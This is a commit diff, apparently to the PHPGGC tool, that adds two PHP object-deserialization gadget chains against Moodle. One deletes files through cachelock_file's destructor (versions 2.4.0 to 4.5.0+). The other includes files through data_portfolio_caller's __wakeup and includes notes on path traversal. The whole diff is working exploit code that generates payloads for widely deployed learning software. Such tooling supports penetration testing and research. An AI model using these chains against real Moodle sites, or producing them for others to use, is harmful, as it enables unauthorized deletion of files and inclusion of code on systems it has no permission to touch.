ambionics · mcdruid · Nov 26, 2024
diff --git a/gadgetchains/Moodle/FD/1/chain.php b/gadgetchains/Moodle/FD/1/chain.php
@@ -0,0 +1,17 @@
+<?php
+
+namespace GadgetChain\Moodle;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '2.4.0 <= 4.5.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'Moodle\'s class loading is "quirky" so classes
+    are not always available.';
+
+    public function generate(array $parameters)
+    {
+        return new \cachelock_file($parameters['remote_path']);
+    }
+}
diff --git a/gadgetchains/Moodle/FD/1/gadgets.php b/gadgetchains/Moodle/FD/1/gadgets.php
@@ -0,0 +1,10 @@
+<?php
+
+class cachelock_file
+{
+    protected $locks = [];
+
+    public function __construct($lockfile) {
+        $this->locks[] = $lockfile;
+    }
+}
diff --git a/gadgetchains/Moodle/FI/1/chain.php b/gadgetchains/Moodle/FI/1/chain.php
@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Moodle;
+
+class FI1 extends \PHPGGC\GadgetChain\FileInclude
+{
+    public static $version = '2.0.0 <= 4.5.0+';
+    public static $vector = '__wakeup';
+    public static $author = 'mcdruid';
+    public static $information = 'Moodle\'s class loading is "quirky" so classes
+    are not always available. This Gadget Chain exploits the following path:
+    $CFG->dirroot . \'/mod/data/field/\' . $field .\'/field.class.php\'
+    ..where the specified value will be injected into $field. Path traversal is
+    possible, but later versions of moodle check the path with file_exists().';
+
+    public function generate(array $parameters)
+    {
+        return new \data_portfolio_caller($parameters['remote_path']);
+    }
+}
diff --git a/gadgetchains/Moodle/FI/1/gadgets.php b/gadgetchains/Moodle/FI/1/gadgets.php
@@ -0,0 +1,11 @@
+<?php
+
+class data_portfolio_caller
+{
+    private $fieldtypes = [];
+
+    public function __construct($fieldtype) {
+        $this->fieldtypes[] = $fieldtype;
+    }
+
+}